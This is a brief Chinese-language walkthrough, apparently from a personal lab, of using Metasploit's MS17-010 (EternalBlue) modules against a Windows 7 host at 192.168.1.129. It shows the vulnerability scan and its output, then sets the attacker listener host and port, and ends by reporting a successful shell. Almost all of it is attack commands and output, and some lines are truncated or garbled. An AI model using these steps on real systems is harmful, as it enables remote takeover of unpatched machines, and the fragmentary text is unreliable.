首先msfconsole的smb模块扫描,看看是否有漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.129
Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona


rhost => 192.168.1.129
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机
lhost => 192.168.1.132
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 2000,个人认为)

shell成功了
